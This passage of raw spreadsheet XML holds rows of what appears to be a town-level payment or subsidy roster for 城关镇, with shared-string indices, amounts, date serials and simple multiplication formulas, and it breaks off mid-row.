        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1156" s="24">
        <v>45108</v>
      </c>
      <c r="K1156" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1157" ht="23" customHeight="1" spans="1:11">
      <c r="A1157" s="13" t="s">
        <v>3079</v>
      </c>
      <c r="B1157" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1157" s="28" t="s">
        <v>3080</v>
      </c>
      <c r="D1157" s="28" t="s">
        <v>3081</v>
      </c>
      <c r="E1157" s="29" t="s">
        <v>3082</v>
      </c>
      <c r="F1157" s="17">
        <v>4113210102</v>
      </c>
      <c r="G1157" s="14">
        <v>1</v>
      </c>
      <c r="H1157" s="14">
        <v>340</v>
      </c>
      <c r="I1157" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1157" s="24">
        <v>45505</v>
      </c>
      <c r="K1157" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1158" ht="23" customHeight="1" spans="1:11">
      <c r="A1158" s="13" t="s">
        <v>3083</v>
      </c>
      <c r="B1158" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1158" s="17" t="s">
        <v>2071</v>
      </c>
      <c r="D1158" s="17" t="s">
        <v>3084</v>
      </c>
      <c r="E1158" s="27" t="s">
        <v>3085</v>
      </c>
      <c r="F1158" s="17">
        <v>4113210102</v>
      </c>
      <c r="G1158" s="14">
        <v>1</v>
      </c>
      <c r="H1158" s="14">
        <v>340</v>
      </c>
      <c r="I1158" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1158" s="24">
        <v>45505</v>
      </c>
      <c r="K1158" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1159" ht="23" customHeight="1" spans="1:11">
      <c r="A1159" s="13" t="s">
        <v>3086</v>
      </c>
      <c r="B1159" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1159" s="17" t="s">
        <v>2074</v>
      </c>
      <c r="D1159" s="17" t="s">
        <v>3087</v>
      </c>
      <c r="E1159" s="27" t="s">
        <v>288</v>
      </c>
      <c r="F1159" s="21">
        <v>4113210108</v>
      </c>
      <c r="G1159" s="14">
        <v>1</v>
      </c>
      <c r="H1159" s="14">
        <v>340</v>
      </c>
      <c r="I1159" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1159" s="24">
        <v>45536</v>
      </c>
      <c r="K1159" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1160" ht="23" customHeight="1" spans="1:11">
      <c r="A1160" s="13" t="s">
        <v>3088</v>
      </c>
      <c r="B1160" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1160" s="17" t="s">
        <v>2988</v>
      </c>
      <c r="D1160" s="17" t="s">
        <v>3089</v>
      </c>
      <c r="E1160" s="27" t="s">
        <v>1281</v>
      </c>
      <c r="F1160" s="21">
        <v>4113210108</v>
      </c>
      <c r="G1160" s="14">
        <v>1</v>
      </c>
      <c r="H1160" s="14">
        <v>340</v>
      </c>
      <c r="I1160" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1160" s="24">
        <v>45536</v>
      </c>
      <c r="K1160" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1161" ht="23" customHeight="1" spans="1:11">
      <c r="A1161" s="13" t="s">
        <v>3090</v>
      </c>
      <c r="B1161" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1161" s="17" t="s">
        <v>3091</v>
      </c>
      <c r="D1161" s="17" t="s">
        <v>3092</v>
      </c>
      <c r="E1161" s="27" t="s">
        <v>3093</v>
      </c>
      <c r="F1161" s="21">
        <v>4113210108</v>
      </c>
      <c r="G1161" s="14">
        <v>2</v>
      </c>
      <c r="H1161" s="14">
        <v>300</v>
      </c>
      <c r="I1161" s="14">
        <f t="shared" si="56"/>
        <v>600</v>
      </c>
      <c r="J1161" s="24">
        <v>45536</v>
      </c>
      <c r="K1161" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1162" ht="23" customHeight="1" spans="1:11">
      <c r="A1162" s="13" t="s">
        <v>3094</v>
      </c>
      <c r="B1162" s="14" t="str">
        <f>B1161</f>
        <v>城关镇</v>
      </c>
      <c r="C1162" s="17" t="str">
        <f>C1161</f>
        <v>商务局（中华办理）</v>
      </c>
      <c r="D1162" s="15" t="s">
        <v>3095</v>
      </c>
      <c r="E1162" s="15" t="s">
        <v>1171</v>
      </c>
      <c r="F1162" s="21">
        <f>F1161</f>
        <v>4113210108</v>
      </c>
      <c r="G1162" s="14"/>
      <c r="H1162" s="14"/>
      <c r="I1162" s="14"/>
      <c r="J1162" s="24"/>
      <c r="K1162" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1163" ht="23" customHeight="1" spans="1:11">
      <c r="A1163" s="13" t="s">
        <v>3096</v>
      </c>
      <c r="B1163" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1163" s="17" t="s">
        <v>2071</v>
      </c>
      <c r="D1163" s="17" t="s">
        <v>3097</v>
      </c>
      <c r="E1163" s="27" t="s">
        <v>331</v>
      </c>
      <c r="F1163" s="21" t="s">
        <v>266</v>
      </c>
      <c r="G1163" s="14">
        <v>1</v>
      </c>
      <c r="H1163" s="14">
        <v>340</v>
      </c>
      <c r="I1163" s="14">
        <f t="shared" ref="I1163:I1171" si="57">H1163*G1163</f>
        <v>340</v>
      </c>
      <c r="J1163" s="24">
        <v>45536</v>
      </c>
      <c r="K1163" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1164" ht="23" customHeight="1" spans="1:11">
      <c r="A1164" s="13" t="s">
        <v>3098</v>
      </c>
      <c r="B1164" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1164" s="17" t="s">
        <v>2071</v>
      </c>
      <c r="D1164" s="17" t="s">
        <v>3099</v>
      </c>
      <c r="E1164" s="27" t="s">
        <v>634</v>
      </c>
      <c r="F1164" s="21" t="s">
        <v>266</v>
      </c>
      <c r="G1164" s="14">
        <v>1</v>
      </c>
      <c r="H1164" s="14">
        <v>340</v>
      </c>
      <c r="I1164" s="14">
        <f t="shared" si="57"/>
        <v>340</v>
      </c>
      <c r="J1164" s="24">
        <v>45536</v>
      </c>
      <c r="K1164" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1165" ht="23" customHeight="1" spans="1:11">
      <c r="A1165" s="13" t="s">
        <v>3100</v>
      </c>
      <c r="B1165" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1165" s="17" t="s">
        <v>3101</v>
      </c>
      <c r="D1165" s="17" t="s">
        <v>3102</v>
      </c>
      <c r="E1165" s="27" t="s">
        <v>3103</v>
      </c>
      <c r="F1165" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1165" s="14">
        <v>1</v>
      </c>
      <c r="H1165" s="14">
        <v>340</v>
      </c>
      <c r="I1165" s="14">
        <f t="shared" si="57"/>
        <v>340</v>
      </c>
      <c r="J1165" s="24">
        <v>45505</v>
      </c>
      <c r="K1165" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1166" ht="23" customHeight="1" spans="1:11">
      <c r="A1166" s="13" t="s">
        <v>3104</v>
      </c>
      <c r="B1166" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1166" s="28" t="s">
        <v>2074</v>
      </c>
      <c r="D1166" s="27" t="s">
        <v>3105</v>
      </c>
      <c r="E1166" s="29" t="s">
        <v>532</v>
      </c>
      <c r="F1166" s="30">
        <v>4113210108</v>
      </c>
      <c r="G1166" s="14">
        <v>1</v>
      </c>
      <c r="H1166" s="14">
        <v>340</v>
      </c>
      <c r="I1166" s="14">
        <f t="shared" si="57"/>
        <v>340</v>
      </c>
      <c r="J1166" s="24">
        <v>45566</v>
      </c>
      <c r="K1166" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1167" ht="23" customHeight="1" spans="1:11">
      <c r="A1167" s="13" t="s">
        <v>3106</v>
      </c>
      <c r="B1167" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1167" s="17" t="s">
        <v>2071</v>
      </c>
      <c r="D1167" s="17" t="s">
        <v>3107</v>
      </c>
      <c r="E1167" s="29" t="s">
        <v>972</v>
      </c>
      <c r="F1167" s="17">
        <v>4113210106</v>
      </c>
      <c r="G1167" s="14">
        <v>1</v>
      </c>
      <c r="H1167" s="14">
        <v>340</v>
      </c>
      <c r="I1167" s="14">
        <f t="shared" si="57"/>
        <v>340</v>
      </c>
      <c r="J1167" s="24">
        <v>45566</v>
      </c>
      <c r="K1167" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1168" ht="23" customHeight="1" spans="1:11">
      <c r="A1168" s="13" t="s">
        <v>3108</v>
      </c>
      <c r="B1168" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1168" s="17" t="s">
        <v>3109</v>
      </c>
      <c r="D1168" s="17" t="s">
        <v>3110</v>
      </c>
      <c r="E1168" s="27" t="s">
        <v>3111</v>
      </c>
      <c r="F1168" s="14">
        <v>4113210105</v>
      </c>
      <c r="G1168" s="14">
        <v>1</v>
      </c>
      <c r="H1168" s="14">
        <v>340</v>
      </c>
      <c r="I1168" s="14">
        <f t="shared" si="57"/>
        <v>340</v>
      </c>
      <c r="J1168" s="24">
        <v>45566</v>
      </c>
      <c r="K1168" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1169" ht="23" customHeight="1" spans="1:11">
      <c r="A1169" s="13" t="s">
        <v>3112</v>
      </c>
      <c r="B1169" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1169" s="14" t="s">
        <v>2077</v>
      </c>
      <c r="D1169" s="17" t="s">
        <v>3113</v>
      </c>
      <c r="E1169" s="17" t="s">
        <v>3114</v>
      </c>
      <c r="F1169" s="14">
        <v>4113210103</v>
      </c>
      <c r="G1169" s="14">
        <v>1</v>
      </c>
      <c r="H1169" s="14">
        <v>340</v>
      </c>
      <c r="I1169" s="14">
        <f t="shared" si="57"/>
        <v>340</v>
      </c>
      <c r="J1169" s="24">
        <v>45566</v>
      </c>
      <c r="K1169" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1170" ht="23" customHeight="1" spans="1:11">
      <c r="A1170" s="13" t="s">
        <v>3115</v>
      </c>
      <c r="B1170" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1170" s="14" t="s">
        <v>2077</v>
      </c>
      <c r="D1170" s="17" t="s">
        <v>3116</v>
      </c>
      <c r="E1170" s="17" t="s">
        <v>1242</v>
      </c>
      <c r="F1170" s="14">
        <v>4113210103</v>
      </c>
      <c r="G1170" s="14">
        <v>1</v>
      </c>
      <c r="H1170" s="14">
        <v>340</v>
      </c>
      <c r="I1170" s="14">
        <f t="shared" si="57"/>
        <v>340</v>
      </c>
      <c r="J1170" s="24">
        <v>45597</v>
      </c>
      <c r="K1170" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1171" ht="23" customHeight="1" spans="1:11">
      <c r="A1171" s="13" t="s">
        <v>3117</v>
      </c>
      <c r="B1171" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1171" s="17" t="s">
        <v>2077</v>
      </c>
      <c r="D1171" s="17" t="s">
        <v>3118</v>
      </c>
      <c r="E1171" s="17" t="s">
        <v>3119</v>
      </c>
      <c r="F1171" s="14">
        <v>4113210103</v>
      </c>
      <c r="G1171" s="14">
        <v>2</v>
      </c>
      <c r="H1171" s="14">
        <v>300</v>
      </c>
      <c r="I1171" s="14">
        <f t="shared" si="57"/>
        <v>600</v>
      </c>
      <c r="J1171" s="24">
        <v>45597</v>
      </c>
      <c r="K1171" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1172" ht="23" customHeight="1" spans="1:11">
      <c r="A1172" s="13" t="s">
        <v>3120</v>
      </c>
      <c r="B1172" s="14" t="str">
        <f>B1171</f>
        <v>城关镇</v>
      </c>
      <c r="C1172" s="14" t="str">
        <f>C1171</f>
        <v>东北社区</v>
      </c>
      <c r="D1172" s="15" t="s">
        <v>3121</v>
      </c>
      <c r="E1172" s="15" t="s">
        <v>3122</v>
      </c>
      <c r="F1172" s="14">
        <f>F1171</f>
        <v>4113210103</v>
      </c>
      <c r="G1172" s="14"/>
      <c r="H1172" s="14"/>
      <c r="I1172" s="14"/>
      <c r="J1172" s="24"/>
      <c r="K1172" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1173" ht="23" customHeight="1" spans="1:11">
      <c r="A1173" s="13" t="s">
        <v>3123</v>
      </c>
      <c r="B1173" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1173" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1173" s="17" t="s">
        <v>3124</v>
      </c>
      <c r="E1173" s="17" t="s">
        <v>983</v>
      </c>
      <c r="F1173" s="14">
        <v>4113210108</v>
      </c>
      <c r="G1173" s="14">
        <v>1</v>
      </c>
      <c r="H1173" s="14">
        <v>340</v>
      </c>
      <c r="I1173" s="14">
        <f>H1173*G1173</f>
        <v>340</v>
      </c>
      <c r="J1173" s="24">
        <v>45597</v>
      </c>
      <c r="K1173" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1174" ht="23" customHeight="1" spans="1:11">
      <c r="A1174" s="13" t="s">
        <v>3125</v>
      </c>
      <c r="B1174" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1174" s="17" t="s">
        <v>3126</v>
      </c>
      <c r="D1174" s="17" t="s">
        <v>3127</v>
      </c>
      <c r="E1174" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F1174" s="14">
        <v>4113210108</v>
      </c>
      <c r="G1174" s="14">
        <v>1</v>
      </c>
      <c r="H1174" s="14">
        <v>340</v>
      </c>
      <c r="I1174" s="14">
        <f>H1174*G1174</f>
        <v>340</v>
      </c>
      <c r="J1174" s="24">
        <v>45597</v>
      </c>
      <c r="K1174" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1175" ht="23" customHeight="1" spans="1:11">
      <c r="A1175" s="13" t="s">
        <v>3128</v>
      </c>
      <c r="B1175" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1175" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D1175" s="14" t="s">
        <v>3129</v>
      </c>
      <c r="E1175" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F1175" s="14">
        <v>4113210103</v>
      </c>
      <c r="G1175" s="14">
        <v>1</v>
      </c>
      <c r="H1175" s="14">
        <v>340</v>
      </c>
      <c r="I1175" s="14">
        <f>H1175*G1175</f>
        <v>340</v>
      </c>
      <c r="J1175" s="24">
        <v>45627</v>
      </c>
      <c r="K1175" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1176" ht="23" customHeight="1" spans="1:11">
      <c r="A1176" s="13" t="s">
        <v>3130</v>
      </c>
      <c r="B1176" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1176" s="14" t="s">
        <v>2082</v>
      </c>
      <c r="D1176" s="14" t="s">
        <v>3131</v>
      </c>
      <c r="E1176" s="14" t="s">
        <v>527</v>
      </c>
      <c r="F1176" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1176" s="14">
        <v>1</v>
      </c>
      <c r="H1176" s="14">
        <v>340</v>
      </c>
      <c r="I1176" s="14">
        <f t="shared" ref="I1176:I1183" si="58">H1176*G1176</f>
        <v>340</v>
      </c>
      <c r="J1176" s="24">
        <v>45658</v>
      </c>
      <c r="K1176" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1177" ht="23" customHeight="1" spans="1:11">
      <c r="A1177" s="13" t="s">
        <v>3132</v>
      </c>
      <c r="B1177" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1177" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1177" s="14" t="s">
        <v>3133</v>
      </c>
      <c r="E1177" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F1177" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1177" s="14">
        <v>1</v>
      </c>
      <c r="H1177" s="14">
        <v>340</v>
      </c>
      <c r="I1177" s="14">
        <f t="shared" si="58"/>
        <v>340</v>
      </c>
      <c r="J1177" s="24">
        <v>45658</v>
      </c>
      <c r="K1177" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1178" ht="23" customHeight="1" spans="1:11">
      <c r="A1178" s="13" t="s">
        <v>3134</v>
      </c>
      <c r="B1178" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1178" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1178" s="14" t="s">
        <v>3135</v>
      </c>
      <c r="E1178" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F1178" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1178" s="14">
        <v>1</v>
      </c>
      <c r="H1178" s="14">
        <v>340</v>
      </c>
      <c r="I1178" s="14">
        <f t="shared" si="58"/>
        <v>340</v>
      </c>
      <c r="J1178" s="24">
        <v>45658</v>
      </c>
      <c r="K1178" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1179" ht="23" customHeight="1" spans="1:11">
      <c r="A1179" s="13" t="s">
        <v>3136</v>
      </c>
      <c r="B1179" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1179" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1179" s="14" t="s">
        <v>3137</v>
      </c>
      <c r="E1179" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F1179" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1179" s="14">
        <v>1</v>
      </c>
      <c r="H1179" s="14">
        <v>340</v>
      </c>
      <c r="I1179" s="14">
        <f t="shared" si="58"/>
        <v>340</v>
      </c>
      <c r="J1179" s="24">
        <v>45658</v>
      </c>
      <c r="K1179" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1180" ht="23" customHeight="1" spans="1:11">
      <c r="A1180" s="13" t="s">
        <v>3138</v>
      </c>
      <c r="B1180" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1180" s="14" t="s">
        <v>3139</v>
      </c>
      <c r="D1180" s="14" t="s">
        <v>3140</v>
      </c>
      <c r="E1180" s="14" t="s">
        <v>637</v>
      </c>
      <c r="F1180" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1180" s="14">
        <v>1</v>
      </c>
      <c r="H1180" s="14">
        <v>380</v>
      </c>
      <c r="I1180" s="14">
        <f t="shared" si="58"/>
        <v>380</v>
      </c>
      <c r="J1180" s="24">
        <v>45658</v>
      </c>
      <c r="K1180" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1181" ht="23" customHeight="1" spans="1:11">
      <c r="A1181" s="13" t="s">
        <v>3141</v>
      </c>
      <c r="B1181" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1181" s="14" t="s">
        <v>3142</v>
      </c>
      <c r="D1181" s="14" t="s">
        <v>3143</v>
      </c>
      <c r="E1181" s="14" t="s">
        <v>1720</v>
      </c>
      <c r="F1181" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1181" s="14">
        <v>1</v>
      </c>
      <c r="H1181" s="14">
        <v>340</v>
      </c>
      <c r="I1181" s="14">
        <f t="shared" si="58"/>
        <v>340</v>
      </c>
      <c r="J1181" s="24">
        <v>45658</v>
      </c>
      <c r="K1181" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1182" ht="23" customHeight="1" spans="1:11">
      <c r="A1182" s="13" t="s">
        <v>3144</v>
      </c>
      <c r="B1182" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1182" s="17" t="s">
        <v>2074</v>
      </c>
      <c r="D1182" s="17" t="s">
        <v>3145</v>
      </c>
      <c r="E1182" s="17" t="s">
        <v>3146</v>
      </c>
      <c r="F1182" s="14">
        <v>4113210106</v>
      </c>
      <c r="G1182" s="14">
        <v>1</v>
      </c>
      <c r="H1182" s="14">
        <v>340</v>
      </c>
      <c r="I1182" s="14">
        <f t="shared" si="58"/>
        <v>340</v>
      </c>
      <c r="J1182" s="24">
        <v>45627</v>
      </c>
      <c r="K1182" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1183" ht="23" customHeight="1" spans="1:11">
      <c r="A1183" s="13" t="s">
        <v>3147</v>
      </c>
      <c r="B1183" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1183" s="17" t="s">
        <v>2077</v>
      </c>
      <c r="D1183" s="17" t="s">
        <v>3148</v>
      </c>
      <c r="E1183" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F1183" s="31">
        <v>4113210103</v>
      </c>
      <c r="G1183" s="14">
        <v>2</v>
      </c>
      <c r="H1183" s="14">
        <v>300</v>
      </c>
      <c r="I1183" s="14">
        <f t="shared" si="58"/>
        <v>600</v>
      </c>
      <c r="J1183" s="24">
        <v>45689</v>
      </c>
      <c r="K1183" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1184" ht="23" customHeight="1" spans="1:11">
      <c r="A1184" s="13" t="s">
        <v>3149</v>
      </c>
      <c r="B1184" s="14" t="str">
        <f>B1183</f>
        <v>城关镇</v>
      </c>
      <c r="C1184" s="17" t="str">
        <f>C1183</f>
        <v>东北社区</v>
      </c>
      <c r="D1184" s="15" t="s">
        <v>3150</v>
      </c>
      <c r="E1184" s="15" t="s">
        <v>1702</v>
      </c>
      <c r="F1184" s="14">
        <f>F1183</f>
        <v>4113210103</v>
      </c>
      <c r="G1184" s="14"/>
      <c r="H1184" s="14"/>
      <c r="I1184" s="14"/>
      <c r="J1184" s="24"/>
      <c r="K1184" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1185" ht="23" customHeight="1" spans="1:11">
      <c r="A1185" s="13" t="s">
        <v>3151</v>
      </c>
      <c r="B1185" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1185" s="17" t="s">
        <v>3142</v>
      </c>
      <c r="D1185" s="17" t="s">
        <v>3152</v>
      </c>
      <c r="E1185" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F1185" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1185" s="14">
        <v>1</v>
      </c>
      <c r="H1185" s="14">
        <v>340</v>
      </c>
      <c r="I1185" s="14">
        <f t="shared" ref="I1185:I1194" si="59">H1185*G1185</f>
        <v>340</v>
      </c>
      <c r="J1185" s="24">
        <v>45717</v>
      </c>
      <c r="K1185" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1186" ht="23" customHeight="1" spans="1:11">
      <c r="A1186" s="13" t="s">
        <v>3153</v>
      </c>
      <c r="B1186" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1186" s="17" t="s">
        <v>2914</v>
      </c>
      <c r="D1186" s="17" t="s">
        <v>3154</v>
      </c>
      <c r="E1186" s="17" t="s">
        <v>1352</v>
      </c>
      <c r="F1186" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1186" s="14">
        <v>1</v>
      </c>
      <c r="H1186" s="14">
        <v>340</v>
      </c>
      <c r="I1186" s="14">
        <f t="shared" si="59"/>
        <v>340</v>
      </c>
      <c r="J1186" s="24">
        <v>45717</v>
      </c>
      <c r="K1186" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1187" ht="23" customHeight="1" spans="1:11">
      <c r="A1187" s="13" t="s">
        <v>3155</v>
      </c>
      <c r="B1187" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1187" s="17" t="s">
        <v>3156</v>
      </c>
      <c r="D1187" s="17" t="s">
        <v>3157</v>
      </c>
      <c r="E1187" s="17" t="s">
        <v>3158</v>
      </c>
      <c r="F1187" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1187" s="14">
        <v>1</v>
      </c>
      <c r="H1187" s="14">
        <v>340</v>
      </c>
      <c r="I1187" s="14">
        <f t="shared" si="59"/>
        <v>340</v>
      </c>
      <c r="J1187" s="24">
        <v>45717</v>
      </c>
      <c r="K1187" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1188" ht="23" customHeight="1" spans="1:11">
      <c r="A1188" s="13" t="s">
        <v>3159</v>
      </c>
      <c r="B1188" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1188" s="17" t="s">
        <v>3160</v>
      </c>
      <c r="D1188" s="17" t="s">
        <v>3161</v>
      </c>
      <c r="E1188" s="17" t="s">
        <v>392</v>
      </c>
      <c r="F1188" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1188" s="14">
        <v>1</v>
      </c>
      <c r="H1188" s="14">
        <v>340</v>
      </c>
      <c r="I1188" s="14">
        <f t="shared" si="59"/>
        <v>340</v>
      </c>
      <c r="J1188" s="24">
        <v>45717</v>
      </c>
      <c r="K1188" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1189" ht="23" customHeight="1" spans="1:11">
      <c r="A1189" s="13" t="s">
        <v>3162</v>
      </c>
      <c r="B1189" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1189" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D1189" s="17" t="s">
        <v>3163</v>
      </c>
      <c r="E1189" s="17" t="s">
        <v>2002</v>
      </c>
      <c r="F1189" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1189" s="14">
        <v>1</v>
      </c>
      <c r="H1189" s="14">
        <v>340</v>
      </c>
      <c r="I1189" s="14">
        <f t="shared" si="59"/>
        <v>340</v>
      </c>
      <c r="J1189" s="24">
        <v>45717</v>
      </c>
      <c r="K1189" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1190" ht="23" customHeight="1" spans="1:11">
      <c r="A1190" s="13" t="s">
        <v>3164</v>
      </c>
      <c r="B1190" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1190" s="17" t="s">
        <v>647</v>
      </c>
      <c r="D1190" s="17" t="s">
        <v>3165</v>
      </c>
      <c r="E1190" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F1190" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1190" s="14">
        <v>1</v>
      </c>
      <c r="H1190" s="14">
        <v>340</v>
      </c>
      <c r="I1190" s="14">
        <f t="shared" si="59"/>
        <v>340</v>
      </c>
      <c r="J1190" s="24">
        <v>45717</v>
      </c>
      <c r="K1190" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1191" ht="23" customHeight="1" spans="1:11">
      <c r="A1191" s="13" t="s">
        <v>3166</v>
      </c>
      <c r="B1191" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1191" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1191" s="14" t="s">
        <v>3167</v>
      </c>
      <c r="E1191" s="14" t="s">
        <v>414</v>
      </c>
      <c r="F1191" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1191" s="14">
        <v>1</v>
      </c>
      <c r="H1191" s="14">
        <v>340</v>
      </c>
      <c r="I1191" s="14">
        <f t="shared" si="59"/>
        <v>340</v>
      </c>
      <c r="J1191" s="24">
        <v>45108</v>
      </c>
      <c r="K1191" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1192" s="1" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A1192" s="13" t="s">
        <v>3168</v>
      </c>
      <c r="B1192" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1192" s="17" t="s">
        <v>3169</v>
      </c>
      <c r="D1192" s="17" t="s">
        <v>3170</v>
      </c>
      <c r="E1192" s="29" t="s">
        <v>3171</v>
      </c>
      <c r="F1192" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1192" s="14">
        <v>1</v>
      </c>
      <c r="H1192" s="14">
        <v>340</v>
      </c>
      <c r="I1192" s="14">
        <f t="shared" si="59"/>
        <v>340</v>
      </c>
      <c r="J1192" s="33" t="s">
        <v>3172</v>
      </c>
      <c r="K1192" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1193" s="1" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A1193" s="13" t="s">
        <v>3173</v>
      </c>
      <c r="B1193" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1193" s="17" t="s">
        <v>2074</v>
      </c>
      <c r="D1193" s="17" t="s">
        <v>3174</v>
      </c>
      <c r="E1193" s="29" t="s">
        <v>3175</v>
      </c>
      <c r="F1193" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1193" s="14">
        <v>1</v>
      </c>
      <c r="H1193" s="14">
        <v>340</v>
      </c>
      <c r="I1193" s="14">
        <f t="shared" si="59"/>
        <v>340</v>
      </c>
      <c r="J1193" s="33" t="s">
        <v>3172</v>
      </c>
      <c r="K1193" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1194" s="2" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A1194" s="13" t="s">
        <v>3176</v>
      </c>
      <c r="B1194" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1194" s="17" t="s">
        <v>3109</v>
      </c>
      <c r="D1194" s="17" t="s">
        <v>3177</v>
      </c>
      <c r="E1194" s="29" t="s">
        <v>3178</v>
      </c>
      <c r="F1194" s="17">
        <v>4113210105</v>
      </c>
      <c r="G1194" s="14">
        <v>1</v>
      </c>
      <c r="H1194" s="14">
        <v>340</v>
      </c>
      <c r="I1194" s="14">
        <f t="shared" si="59"/>
        <v>340</v>
      </c>
      <c r="J1194" s="33" t="s">
        <v>3172</v>
      </c>
      <c r="K1194" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1195" s="3" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A1195" s="13" t="s">
        <v>3179</v>
      </c>
      <c r="B1195" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1195" s="17" t="s">
        <v>286</v>
